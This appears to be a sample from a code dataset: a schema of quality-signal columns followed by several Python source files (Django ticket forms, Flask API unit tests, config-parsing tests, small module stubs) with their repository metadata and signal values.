**Schema.** One row per source file. The `qsc_*` columns come in pairs: a raw quality-signal value (name ending in `_quality_signal`) and a matching integer hit flag with the same name minus the suffix (1 = the corresponding filter fired). The trailing `effective` and `hits` columns close each row.

| Field | Type |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| effective | string |
| hits | int64 |

For each prefix `max_stars`, `max_issues`, `max_forks` there are seven repo-metadata columns (the `*` in the datetime names is `stars`, `issues`, or `forks` to match the prefix):

| Field | Type |
|---|---|
| {prefix}_repo_path | string |
| {prefix}_repo_name | string |
| {prefix}_repo_head_hexsha | string |
| {prefix}_repo_licenses | list |
| {prefix}_count | int64 |
| {prefix}_repo_*_event_min_datetime | string |
| {prefix}_repo_*_event_max_datetime | string |

The 41 quality-signal stems, in column order. Signal type is float64 and flag type is int64 unless noted; the flag columns for `frac_words_unique` and `frac_lines_string_concat` are null throughout this sample.

| # | Stem | Signal | Flag |
|---|---|---|---|
| 1 | qsc_code_num_words | int64 | int64 |
| 2 | qsc_code_num_chars | float64 | int64 |
| 3 | qsc_code_mean_word_length | float64 | int64 |
| 4 | qsc_code_frac_words_unique | float64 | null |
| 5 | qsc_code_frac_chars_top_2grams | float64 | int64 |
| 6 | qsc_code_frac_chars_top_3grams | float64 | int64 |
| 7 | qsc_code_frac_chars_top_4grams | float64 | int64 |
| 8–13 | qsc_code_frac_chars_dupe_5grams … dupe_10grams | float64 | int64 |
| 14 | qsc_code_frac_chars_replacement_symbols | float64 | int64 |
| 15 | qsc_code_frac_chars_digital | float64 | int64 |
| 16 | qsc_code_frac_chars_whitespace | float64 | int64 |
| 17 | qsc_code_size_file_byte | float64 | int64 |
| 18 | qsc_code_num_lines | float64 | int64 |
| 19 | qsc_code_num_chars_line_max | float64 | int64 |
| 20 | qsc_code_num_chars_line_mean | float64 | int64 |
| 21 | qsc_code_frac_chars_alphabet | float64 | int64 |
| 22 | qsc_code_frac_chars_comments | float64 | int64 |
| 23 | qsc_code_cate_xml_start | float64 | int64 |
| 24 | qsc_code_frac_lines_dupe_lines | float64 | int64 |
| 25 | qsc_code_cate_autogen | float64 | int64 |
| 26 | qsc_code_frac_lines_long_string | float64 | int64 |
| 27 | qsc_code_frac_chars_string_length | float64 | int64 |
| 28 | qsc_code_frac_chars_long_word_length | float64 | int64 |
| 29 | qsc_code_frac_lines_string_concat | float64 | null |
| 30 | qsc_code_cate_encoded_data | float64 | int64 |
| 31 | qsc_code_frac_chars_hex_words | float64 | int64 |
| 32 | qsc_code_frac_lines_prompt_comments | float64 | int64 |
| 33 | qsc_code_frac_lines_assert | float64 | int64 |
| 34 | qsc_codepython_cate_ast | float64 | int64 |
| 35 | qsc_codepython_frac_lines_func_ratio | float64 | int64 |
| 36 | qsc_codepython_cate_var_zero | bool | int64 |
| 37 | qsc_codepython_frac_lines_pass | float64 | int64 |
| 38 | qsc_codepython_frac_lines_import | float64 | int64 |
| 39 | qsc_codepython_frac_lines_simplefunc | float64 | int64 |
| 40 | qsc_codepython_score_lines_no_logic | float64 | int64 |
| 41 | qsc_codepython_frac_lines_print | float64 | int64 |

The sample rows follow. Each record lists its metadata, the file content, the three line statistics, and then the two 41-value runs ("Signals" and "Flags") in the stem order above.
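These columns mirror RedPajama-style code quality signals, but the sample does not state the tokenizer, n-gram definition, or thresholds that produced the numbers. As a rough illustration of what a few of the signals measure, here is a minimal sketch; every formula in it is an assumption, not the dataset's actual pipeline.

```python
import re


def approx_quality_signals(code: str) -> dict:
    """Rough guesses at a few qsc_code_* signals (assumed definitions)."""
    words = re.findall(r"\w+", code)   # assumed word tokenization
    lines = code.splitlines()
    grams = [" ".join(words[i:i + 5]) for i in range(len(words) - 4)]
    dupes = {g for g in grams if grams.count(g) > 1}   # 5-grams seen more than once
    return {
        "num_words": len(words),
        "frac_words_unique": len(set(words)) / len(words) if words else 0.0,
        "frac_chars_dupe_5grams": sum(len(g) for g in dupes) / max(len(code), 1),
        "frac_lines_import": sum(
            l.lstrip().startswith(("import ", "from ")) for l in lines
        ) / max(len(lines), 1),
    }


print(approx_quality_signals("from a import b\nfrom a import c\nx = b + c\n"))
```

The names map one-to-one onto table columns; the exact numbers in the records below will differ from what this sketch computes.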
---

**`cf7a48242cc262b8b8471ee7441d783064259b3a`** · size 300 · ext `py` · lang Python

- **max_stars / max_issues / max_forks** (identical): `yeast/core/media/sc/__init__.py` in `irahorecka/sga-fba` @ `fc7e923da8e79555780359f018c85b5e5339d8d0`, licenses `["MIT"]`; all counts and event datetimes null

```python
from yeast.core.media.sc.base import sc
from yeast.core.media.sc.sc_no_ade import sc_no_ade
from yeast.core.media.sc.sc_no_arg import sc_no_arg
from yeast.core.media.sc.sc_no_ino import sc_no_ino
from yeast.core.media.sc.sc_no_lys import sc_no_lys
from yeast.core.media.sc.sc_no_met import sc_no_met
```

`avg_line_length` 42.857143 · `max_line_length` 51 · `alphanum_fraction` 0.84

Signals: 68, 300, 3.411765, 0.191176, 0.172414, 0.336207, 0.465517, 0.603448, 0.517241, 0.517241, 0, 0, 0, 0, 0, 0.08, 300, 6, 52, 50, 0.84058, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, true, 0, 1, 0, 1, 0

Flags: 0, 0, 0, null, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0

`effective` 0 · `hits` 6
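The two runs above are positional: pairing a run with the stem list from the schema recovers which filter each value belongs to. A toy decode using just the first seven stems (the full list has 41) illustrates the idea; the stem list here is abbreviated for brevity, not part of the dataset.

```python
# Toy positional decode: first seven stems only; a real decode uses all 41.
stems = ["num_words", "num_chars", "mean_word_length", "frac_words_unique",
         "frac_chars_top_2grams", "frac_chars_top_3grams", "frac_chars_top_4grams"]
flags = [0, 0, 0, None, 0, 1, 1]   # start of the flag run in the record above

print([s for s, f in zip(stems, flags) if f == 1])
# -> ['frac_chars_top_3grams', 'frac_chars_top_4grams']
```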
---

**`d8939b69dac88606f611a416132228994f516d92`** · size 165 · ext `py` · lang Python

- **max_stars / max_issues / max_forks** (identical): `frappe/core/doctype/file/exceptions.py` in `FHenry/frappe` @ `b1e97c1ff489aa28f1b28f681453f42ecc846254`, licenses `["MIT"]`; all counts and event datetimes null

```python
import frappe


class MaxFileSizeReachedError(frappe.ValidationError):
    pass


class FolderNotEmpty(frappe.ValidationError):
    pass


from frappe.exceptions import *
```

`avg_line_length` 12.692308 · `max_line_length` 54 · `alphanum_fraction` 0.818182

Signals: 16, 165, 8.4375, 0.5625, 0.311111, 0.37037, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.121212, 165, 12, 55, 13.75, 0.931034, 0, 0, 0.333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, true, 0.333333, 0.333333, 0, 0.666667, 0

Flags: 1, 0, 0, null, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0

`effective` 0 · `hits` 6
---

**`d8a7ce4390e332127143c70ee55f93238d9c82a0`** · size 115 · ext `py` · lang Python

- **max_stars**: `pelican/plugins/bibliography/test_bibliography.py` in `micahjsmith/pelican-bibliography` @ `b612fa9d3be5dcf7300fe4b90d25dc2de3778e30`, licenses `["MIT"]`; stars 3; events 2021-02-18T20:27:29.000Z – 2022-01-24T16:21:52.000Z
- **max_issues / max_forks**: same file, repo, head, and licenses; counts and event datetimes null

```python
from pelican.plugins.bibliography import __version__


def test_version():
    assert isinstance(__version__, str)
```

`avg_line_length` 19.166667 · `max_line_length` 52 · `alphanum_fraction` 0.8

Signals: 13, 115, 6.384615, 0.846154, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.130435, 115, 5, 53, 23, 0.83, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.333333, 1, 0.333333, true, 0, 0.333333, 0, 0.666667, 0

Flags: 1, 0, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 1, 1, 0, 1, 0, 1, 0

`effective` 0 · `hits` 6
---

**`2b03bff91cbb0e4eb51750a27331565d4b489454`** · size 7602 · ext `py` · lang Python

- **max_stars**: `todoes/forms_rus.py` in `Ishayahu/MJCC-tasks` @ `68ea00dab543e6e4e0f6cf6b6683f3719bb6f3c0`, licenses `["MIT"]`; stars 1; events 2017-09-25T09:36:46.000Z – 2017-09-25T09:36:46.000Z
- **max_issues**: same file, repo, head, and licenses; issues 40; events 2015-05-29T11:25:15.000Z – 2015-08-13T10:28:17.000Z
- **max_forks**: same file, repo, head, and licenses; count and event datetimes null

```python
# -*- coding:utf-8 -*-
# coding=<utf8>
#TODO: сделать английские формы
from django import forms
from django.forms import ModelForm
from todoes.models import Note, Resource, File, Person, Task,\
    ProblemByWorker, ProblemByUser, Categories, Message
# from tasks.todoes.models import Worker, Client
from django.contrib.auth.forms import UserCreationForm
from django.contrib.admin import widgets

PRIORITY_CHOICES = (
    ('1','Лазар/Борода/Мотя'),
    ('2','Если не сделать сейчас - огребём проблем потом'),
    ('3','Всё остальное'),
    ('4','В ближайшем будущем'),
    ('5','Когда время будет')
)

inp_f=( '%d-%m-%Y %H:%M:%S',  # '2006-10-25 14:30:59'
        '%d-%m-%Y %H:%M',     # '2006-10-25 14:30'
        '%Y-%m-%d %H:%M:%S',  # '2006-10-25 14:30'
        '%d-%m-%Y',           # '2006-10-25'
        '%d/%m/%Y %H:%M:%S',  # '10/25/2006 14:30:59'
        '%d/%m/%Y %H:%M',     # '10/25/2006 14:30'
        '%d/%m/%Y',           # '10/25/2006'
        '%d.%m.%Y %H:%M:%S',  # '10/25/2006 14:30:59'
        '%Y.%m.%d %H:%M:%S',  # '2010/01/26 14:30:59'
        '%d/%m/%y %H:%M:%S',  # '10/25/06 14:30:59'
        '%d/%m/%y %H:%M',     # '10/25/06 14:30'
        '%d/%m/%y', )


class NewTicketForm_RUS(forms.Form):
    name = forms.CharField(max_length=140, label='Название заявки')
    pbus = forms.ModelChoiceField(queryset = ProblemByUser.objects.all(), label='Проблема со слов пользователя')
    description = forms.CharField(widget=forms.Textarea, label='Описание')
    clients = forms.ModelChoiceField(queryset = Person.objects.all(), label='Заявитель')
    priority = forms.ChoiceField(widget=forms.RadioSelect,choices = PRIORITY_CHOICES, label='Приоритет')
    category = forms.ModelChoiceField(queryset = Categories.objects.all(), label='Категория')
    start_date = forms.DateTimeField(label='Дата создания заявки')
    due_date = forms.DateTimeField(label='Предполагаемая дата завершения',input_formats=inp_f)
    workers = forms.ModelChoiceField(queryset = Person.objects.all(), label='Исполнитель')
    percentage = forms.DecimalField(min_value=0, max_value=100, label='Процент выполнения')
    file = forms.FileField(label="Прикрепить файл", required=False)


class TicketEditForm_RUS(forms.Form):
    name = forms.CharField(max_length=140, label='Название заявки')
    pbus = forms.ModelChoiceField(queryset = ProblemByUser.objects.all(), label='Проблема со слов пользователя')
    description = forms.CharField(widget=forms.Textarea, label='Описание')
    clients = forms.ModelChoiceField(queryset = Person.objects.all(), label='Заявитель')
    priority = forms.ChoiceField(choices = PRIORITY_CHOICES, label='Приоритет')
    category = forms.ModelChoiceField(queryset = Categories.objects.all(), label='Категория')
    start_date = forms.DateTimeField(label='Дата создания заявки',input_formats=inp_f)
    when_to_reminder = forms.DateTimeField(label='Установить напоминание',input_formats=inp_f,required=False)
    due_date = forms.DateTimeField(label='Предполагаемая дата завершения',input_formats=inp_f)
    workers = forms.ModelChoiceField(queryset = Person.objects.all(), label='Исполнитель')
    percentage = forms.DecimalField(min_value=0, max_value=100, label='Процент выполнения')
    file = forms.FileField(label="Прикрепить файл", required=False)


class NewRegularTicketForm_RUS(forms.Form):
    name = forms.CharField(max_length=140, label='Название заявки')
    description = forms.CharField(widget=forms.Textarea, label='Описание',required=False)
    clients = forms.ModelChoiceField(queryset = Person.objects.all(), label='Заявитель')
    priority = forms.ChoiceField(widget=forms.RadioSelect,choices = PRIORITY_CHOICES, label='Приоритет')
    category = forms.ModelChoiceField(queryset = Categories.objects.all(), label='Категория')
    start_date = forms.DateTimeField(label='Дата создания заявки',input_formats=inp_f)
    stop_date = forms.DateTimeField(label='Дата завершения',input_formats=inp_f,required=False)
    workers = forms.ModelChoiceField(queryset = Person.objects.all(), label='Исполнитель')


class EditRegularTicketForm_RUS(forms.Form):
    name = forms.CharField(max_length=140, label='Название заявки')
    description = forms.CharField(widget=forms.Textarea, label='Описание',required=False)
    clients = forms.ModelChoiceField(queryset = Person.objects.all(), label='Заявитель')
    priority = forms.ChoiceField(widget=forms.RadioSelect,choices = PRIORITY_CHOICES, label='Приоритет')
    category = forms.ModelChoiceField(queryset = Categories.objects.all(), label='Категория')
    start_date = forms.DateTimeField(label='Дата создания заявки',input_formats=inp_f)
    when_to_reminder = forms.DateTimeField(label='Установить напоминание',input_formats=inp_f,required=False)
    stop_date = forms.DateTimeField(label='Дата завершения',input_formats=inp_f,required=False)
    workers = forms.ModelChoiceField(queryset = Person.objects.all(), label='Исполнитель')


class TicketClosingForm_RUS(forms.Form):
    done_date = forms.DateTimeField(label='Дата закрытия заявки',input_formats=inp_f)
    pbw = forms.ModelChoiceField(queryset = ProblemByWorker.objects.all(), label='Выявленная проблема')


class TicketConfirmingForm_RUS(forms.Form):
    confirmed = forms.BooleanField(required=False)
    confirmed_date = forms.DateTimeField(label='Дата подтверждения закрытия заявки',input_formats=inp_f)


# class NoteToTicketAddForm(forms.Form):
#     note = forms.CharField(widget=forms.Textarea, label='Комментарий',required=False )
#     workers = forms.ModelMultipleChoiceField(queryset = Person.objects.all(), label='Кого ещё уведомить о комментарии?',required=False)


class UserCreationFormMY(UserCreationForm):
    fio = forms.CharField(label='ФИО')
    mail = forms.EmailField(label = 'Мыло')
    tel = forms.CharField(label='Телефон', max_length=10, min_length=10)


class TicketSearchForm_RUS(forms.Form):
    name = forms.CharField(max_length=140, label='Текст для поиска')


class NoteToTicketAddForm_RUS(forms.Form):
    def __init__(self, *args, **kwargs):
        self.defaults = kwargs.pop('defaults','')
        self.exclude = kwargs.pop('exclude','')
        super(NoteToTicketAddForm_RUS, self).__init__(*args, **kwargs)
        self.fields['workers'].queryset = Person.objects.exclude(fio__in = [person.fio for person in self.exclude ])
        self.fields['workers'].initial = Person.objects.filter(fio__in = self.defaults)

    note = forms.CharField(widget=forms.Textarea, label='Комментарий',required=False )
    workers = forms.ModelMultipleChoiceField(queryset = Person.objects.all(), label='Кого ещё уведомить о комментарии?',required=False,)


class File_and_NoteToTicketAddForm_RUS(forms.Form):
    def __init__(self, *args, **kwargs):
        self.defaults = kwargs.pop('defaults','')
        self.exclude = kwargs.pop('exclude','')
        super(File_and_NoteToTicketAddForm_RUS, self).__init__(*args, **kwargs)
        self.fields['workers'].queryset = Person.objects.exclude(fio__in = [person.fio for person in self.exclude ])
        self.fields['workers'].initial = Person.objects.filter(fio__in = self.defaults)

    note = forms.CharField(widget=forms.Textarea, label='Комментарий',required=False )
    file = forms.FileField()
    workers = forms.ModelMultipleChoiceField(queryset = Person.objects.all(), label='Кого ещё уведомить о комментарии?',required=False,)


class NewMessageForm(ModelForm):
    class Meta:
        model = Message
        fields = ['name', 'text',]
        # localized_fields = ['name', 'text',]
```

`avg_line_length` 59.858268 · `max_line_length` 138 · `alphanum_fraction` 0.708498

Signals: 918, 7602, 5.765795, 0.204793, 0.034007, 0.051011, 0.049877, 0.798791, 0.780087, 0.766484, 0.766484, 0.756471, 0.756471, 0, 0.025309, 0.147593, 7602, 127, 139, 59.858268, 0.791512, 0.080374, 0, 0.5, 0, 0, 0.161216, 0, 0, 0, 0, 0.007874, 0, 1, 0.019231, false, 0, 0.048077, 0, 0.692308, 0

Flags: 0, 0, 0, null, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0

`effective` 0 · `hits` 6
---

**`2b731f45f823653585a0f413f9abb22a2de67485`** · size 4669 · ext `py` · lang Python

- **max_stars / max_issues**: `unit_tests/test_update_land_charge.py` in `LandRegistry/maintain-api` @ `fa1ecf71332b47606293c59eeaed8ae43d5231cd`, licenses `["MIT"]`; counts and event datetimes null
- **max_forks**: same file, repo, head, and licenses; forks 1; events 2021-04-11T05:25:02.000Z – 2021-04-11T05:25:02.000Z

```python
from unittest import TestCase
from unittest.mock import patch, MagicMock
from maintain_api.main import app
import json

RESPONSE_SUCCESS = {
    "entry_number": 1,
    "local-land-charge": 2
}


class TestUpdateLandCharge(TestCase):

    def setUp(self):
        self.app = app.test_client()
        self.jwt_patcher = patch("maintain_api.app.validate")
        self.mock_jwt_validate = self.jwt_patcher.start()

    def tearDown(self):
        self.jwt_patcher.stop()

    @patch('maintain_api.views.v1_0.update_land_charge.current_app')
    @patch('maintain_api.views.v1_0.update_land_charge.MintApiService')
    @patch('maintain_api.views.v1_0.update_land_charge.SearchApiService')
    def test_update_charge(self, mock_search_api_service, mock_mint_api_service, mock_current_app):
        response = MagicMock()
        response.status_code = 200
        mock_search_api_service.get_by_charge_number.return_value = response
        mock_mint_api_service.add_to_register.return_value = RESPONSE_SUCCESS, 202
        headers = {'Content-Type': 'application/json', 'Authorization': 'NOTAREALJWT'}
        payload_json = {"local-land-charge": 123, "registration-date": "2012-10-10"}
        result = self.app.put('/v1.0/maintain/local-land-charge/123', data=json.dumps(payload_json), headers=headers)
        mock_current_app.logger.performance_platform.assert_called_with(
            "Successfully updated charge '123'"
        )
        result_json = json.loads(result.data.decode('utf-8'))
        self.assertEqual(result.status_code, 202)
        self.assertEqual(result_json, {'entry_number': 1, 'land_charge_id': 2, 'registration_date': '2012-10-10'})

    @patch('maintain_api.views.v1_0.update_land_charge.current_app')
    @patch('maintain_api.views.v1_0.update_land_charge.MintApiService')
    @patch('maintain_api.views.v1_0.update_land_charge.SearchApiService')
    def test_cancel_charge(self, mock_search_api_service, mock_mint_api_service, mock_current_app):
        response = MagicMock()
        response.status_code = 200
        mock_search_api_service.get_by_charge_number.return_value = response
        mock_mint_api_service.add_to_register.return_value = RESPONSE_SUCCESS, 202
        headers = {'Content-Type': 'application/json', 'Authorization': 'NOTAREALJWT'}
        payload_json = {"local-land-charge": 123, "registration-date": "2012-10-10", "end-date": "2020-10-10"}
        result = self.app.put('/v1.0/maintain/local-land-charge/123', data=json.dumps(payload_json), headers=headers)
        mock_current_app.logger.performance_platform.assert_called_with(
            "Successfully cancelled charge '123'"
        )
        result_json = json.loads(result.data.decode('utf-8'))
        self.assertEqual(result.status_code, 202)
        self.assertEqual(result_json, {'entry_number': 1, 'land_charge_id': 2, 'registration_date': '2012-10-10'})

    @patch('maintain_api.views.v1_0.update_land_charge.current_app')
    def test_update_charge_nomatch(self, mock_current_app):
        headers = {'Content-Type': 'application/json', 'Authorization': 'NOTAREALJWT'}
        payload_json = {"local-land-charge": 123, "registration-date": "2012-10-10"}
        result = self.app.put('/v1.0/maintain/local-land-charge/1234', data=json.dumps(payload_json), headers=headers)
        self.assertEqual(mock_current_app.logger.performance_platform.mock_calls, [])
        result_json = json.loads(result.data.decode('utf-8'))
        self.assertEqual(result.status_code, 400)
        self.assertEqual(result_json, {'error_code': 'U100',
                                       'error_message': 'Cannot change local-land-charge field'})

    @patch('maintain_api.views.v1_0.update_land_charge.current_app')
    @patch('maintain_api.views.v1_0.update_land_charge.SearchApiService')
    def test_charge_not_found(self, mock_search_api_service, mock_current_app):
        response = MagicMock()
        response.status_code = 404
        mock_search_api_service.get_by_charge_number.return_value = response
        headers = {'Content-Type': 'application/json', 'Authorization': 'NOTAREALJWT'}
        payload_json = {"local-land-charge": 123, "registration-date": "2012-10-10"}
        result = self.app.put('/v1.0/maintain/local-land-charge/123', data=json.dumps(payload_json), headers=headers)
        self.assertEqual(mock_current_app.logger.performance_platform.mock_calls, [])
        result_json = json.loads(result.data.decode('utf-8'))
        self.assertEqual(result.status_code, 400)
        self.assertEqual(result_json, {'error_code': 'U101',
                                       'error_message': 'Cannot find local land charge'})
```

`avg_line_length` 51.307692 · `max_line_length` 118 · `alphanum_fraction` 0.707004

Signals: 600, 4669, 5.216667, 0.173333, 0.070288, 0.052716, 0.060383, 0.836102, 0.836102, 0.831629, 0.831629, 0.831629, 0.831629, 0, 0.040154, 0.167916, 4669, 90, 119, 51.877778, 0.765508, 0, 0, 0.589041, 0, 0, 0.304562, 0.144999, 0, 0, 0, 0, 0.164384, 1, 0.082192, false, 0, 0.054795, 0, 0.150685, 0

Flags: 0, 0, 0, null, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

`effective` 0 · `hits` 6
---

**`2b73e8328f84763fd28db80ccfac318a0bc38586`** · size 66 · ext `py` · lang Python

- **max_stars**: `test/run/t236.py` in `timmartin/skulpt` @ `2e3a3fbbaccc12baa29094a717ceec491a8a6750`, licenses `["MIT"]`; stars 2671; events 2015-01-03T08:23:25.000Z – 2022-03-31T06:15:48.000Z
- **max_issues**: `test/run/t236.py` in `csev/skulpt` @ `9aa25b7dbf29f23ee8d3140d01a6f4353d12e66f`, licenses `["MIT"]`; issues 972; events 2015-01-05T08:11:00.000Z – 2022-03-29T13:47:15.000Z
- **max_forks**: same file, repo, head, and licenses as max_issues; forks 845; events 2015-01-03T19:53:36.000Z – 2022-03-29T18:34:22.000Z

```python
import pkga.pkgb.modc as c_me

print c_me.stuff
print c_me.things
```

`avg_line_length` 13.2 · `max_line_length` 29 · `alphanum_fraction` 0.80303

Signals: 15, 66, 3.333333, 0.666667, 0.18, 0.32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.136364, 66, 4, 30, 16.5, 0.877193, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, null, 0, 0.333333, null, null, 0.666667

Flags: 1, 0, 0, null, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1

`effective` 0 · `hits` 6

(The nulls in this record's Python-specific signals fit the content: the file is Python 2, so an AST parse under Python 3 fails and `qsc_codepython_cate_ast` is 0.)
---

**`9947266f4917ae4fc8647a6efe042cf5ee41e71a`** · size 27 · ext `py` · lang Python

- **max_stars**: `desktop/core/ext-py/nose-1.3.7/functional_tests/test_issue120/support/some_test.py` in `kokosing/hue` @ `2307f5379a35aae9be871e836432e6f45138b3d9`, licenses `["Apache-2.0"]`; stars 5079; events 2015-01-01T03:39:46.000Z – 2022-03-31T07:38:22.000Z
- **max_issues**: same file in `zks888/hue` @ `93a8c370713e70b216c428caa2f75185ef809deb`, licenses `["Apache-2.0"]`; issues 1623; events 2015-01-01T08:06:24.000Z – 2022-03-30T19:48:52.000Z
- **max_forks**: same file, repo, head, and licenses as max_issues; forks 2033; events 2015-01-04T07:18:02.000Z – 2022-03-28T19:55:47.000Z

```python
def some_test():
    pass
```

`avg_line_length` 6.75 · `max_line_length` 16 · `alphanum_fraction` 0.592593

Signals: 4, 27, 3.75, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.296296, 27, 3, 17, 9, 0.789474, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0.5, true, 0.5, 0, 0, 0.5, 0

Flags: 1, 1, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0

`effective` 0 · `hits` 6
---

**`994d52b2c733016d59725a5f4ba1f81028bf6eec`** · size 5483 · ext `py` · lang Python

- **max_stars**: `test/unit/test_package_defaults.py` in `jimporter/mopack` @ `e912be11528645f5463e7873b5470c420b698418`, licenses `["BSD-3-Clause"]`; count and event datetimes null
- **max_issues**: same file, repo, head, and licenses; issues 17; events 2020-07-23T20:28:36.000Z – 2022-03-04T04:33:55.000Z
- **max_forks**: same file, repo, head, and licenses; forks 1; events 2020-11-04T03:51:20.000Z – 2020-11-04T03:51:20.000Z

```python
from unittest import mock, TestCase

from mopack.package_defaults import DefaultConfig, _get_default_config
from mopack.yaml_tools import YamlParseError


def mock_open(read_data):
    return mock.mock_open(read_data=read_data)


class TestDefaultConfig(TestCase):
    def test_string_field(self):
        data = 'source:\n foo:\n field: value'
        with mock.patch('builtins.open', mock_open(data)):
            cfg = DefaultConfig('file.yml')
        self.assertEqual(cfg.get({}, 'source', 'foo', 'field'), 'value')
        self.assertEqual(cfg.get({}, 'source', 'foo', 'other'), None)
        self.assertEqual(cfg.get({}, 'source', 'foo', 'other', 'default'),
                         'default')
        self.assertEqual(cfg.get({}, 'source', 'bar', 'field'), None)
        self.assertEqual(cfg.get({}, 'source', 'bar', 'field', 'default'),
                         'default')
        self.assertEqual(cfg.get({}, 'usage', 'foo', 'field'), None)
        self.assertEqual(cfg.get({}, 'usage', 'foo', 'field', 'default'),
                         'default')

    def test_list_field(self):
        data = 'source:\n foo:\n field: [1, 2]'
        with mock.patch('builtins.open', mock_open(data)):
            cfg = DefaultConfig('file.yml')
        self.assertEqual(cfg.get({}, 'source', 'foo', 'field'), [1, 2])
        self.assertEqual(cfg.get({}, 'source', 'foo', 'other'), None)
        self.assertEqual(cfg.get({}, 'source', 'foo', 'other', []), [])
        self.assertEqual(cfg.get({}, 'source', 'bar', 'field'), None)
        self.assertEqual(cfg.get({}, 'source', 'bar', 'field', []), [])

    def test_dict_field(self):
        data = 'source:\n foo:\n field: {goat: 1, panda: 2}'
        with mock.patch('builtins.open', mock_open(data)):
            cfg = DefaultConfig('file.yml')
        self.assertEqual(cfg.get({}, 'source', 'foo', 'field'),
                         {'goat': 1, 'panda': 2})
        self.assertEqual(cfg.get({}, 'source', 'foo', 'other'), None)
        self.assertEqual(cfg.get({}, 'source', 'foo', 'other', {}), {})
        self.assertEqual(cfg.get({}, 'source', 'bar', 'field'), None)
        self.assertEqual(cfg.get({}, 'source', 'bar', 'field', {}), {})

    def test_expr_field(self):
        data = 'source:\n foo:\n field: $variable'
        with mock.patch('builtins.open', mock_open(data)):
            cfg = DefaultConfig('file.yml')
        symbols = {'variable': 'goat'}
        self.assertEqual(cfg.get(symbols, 'source', 'foo', 'field'), 'goat')
        self.assertEqual(cfg.get(symbols, 'source', 'bar', 'field'), None)
        symbols = {'variable': 'panda'}
        self.assertEqual(cfg.get(symbols, 'source', 'foo', 'field'), 'panda')
        self.assertEqual(cfg.get(symbols, 'source', 'bar', 'field'), None)

    def test_conditional(self):
        data = 'source:\n foo:\n - if: true\n field: goat'
        with mock.patch('builtins.open', mock_open(data)):
            cfg = DefaultConfig('file.yml')
        self.assertEqual(cfg.get({}, 'source', 'foo', 'field'), 'goat')
        self.assertEqual(cfg.get({}, 'source', 'bar', 'field'), None)
        data = 'source:\n foo:\n - if: false\n field: goat'
        with mock.patch('builtins.open', mock_open(data)):
            cfg = DefaultConfig('file.yml')
        self.assertEqual(cfg.get({}, 'source', 'foo', 'field'), None)
        self.assertEqual(cfg.get({}, 'source', 'bar', 'field'), None)

    def test_conditional_expr(self):
        data = ('source:\n foo:\n - if: variable == true\n' +
                ' field: goat\n - field: panda')
        with mock.patch('builtins.open', mock_open(data)):
            cfg = DefaultConfig('file.yml')
        symbols = {'variable': True}
        self.assertEqual(cfg.get(symbols, 'source', 'foo', 'field'), 'goat')
        self.assertEqual(cfg.get(symbols, 'source', 'bar', 'field'), None)
        symbols = {'variable': False}
        self.assertEqual(cfg.get(symbols, 'source', 'foo', 'field'), 'panda')
        self.assertEqual(cfg.get(symbols, 'source', 'bar', 'field'), None)

    def test_invalid_conditional(self):
        data = ('source:\n foo:\n - field: goat\n - field: panda')
        with mock.patch('builtins.open', mock_open(data)), \
                self.assertRaises(YamlParseError):  # noqa
            DefaultConfig('file.yml')

    def test_invalid_genus(self):
        data = ('goofy:\n foo:\n field: value')
        with mock.patch('builtins.open', mock_open(data)), \
                self.assertRaises(YamlParseError):  # noqa
            DefaultConfig('file.yml')
        data = ('source:\n foo:\n field: value')
        with mock.patch('builtins.open', mock_open(data)):
            cfg = DefaultConfig('file.yml')
        with self.assertRaises(ValueError):
            cfg.get({}, 'goofy', 'foo', 'field')


class TestGetDefaultConfig(TestCase):
    def setUp(self):
        _get_default_config._reset()

    def tearDown(self):
        _get_default_config._reset()

    def test_normal(self):
        with mock.patch('os.path.exists', return_value=False) as mexists:
            _get_default_config('foo')
            mexists.assert_called_once()

    def test_invalid_characters(self):
        with mock.patch('os.path.exists', return_value=False) as mexists:
            _get_default_config('foo/bar')
            _get_default_config('.')
            _get_default_config('../foo')
            mexists.assert_not_called()
```

(Whitespace inside the `data` string literals is reproduced as it appears in the source dump.)

`avg_line_length` 41.537879 · `max_line_length` 77 · `alphanum_fraction` 0.569943

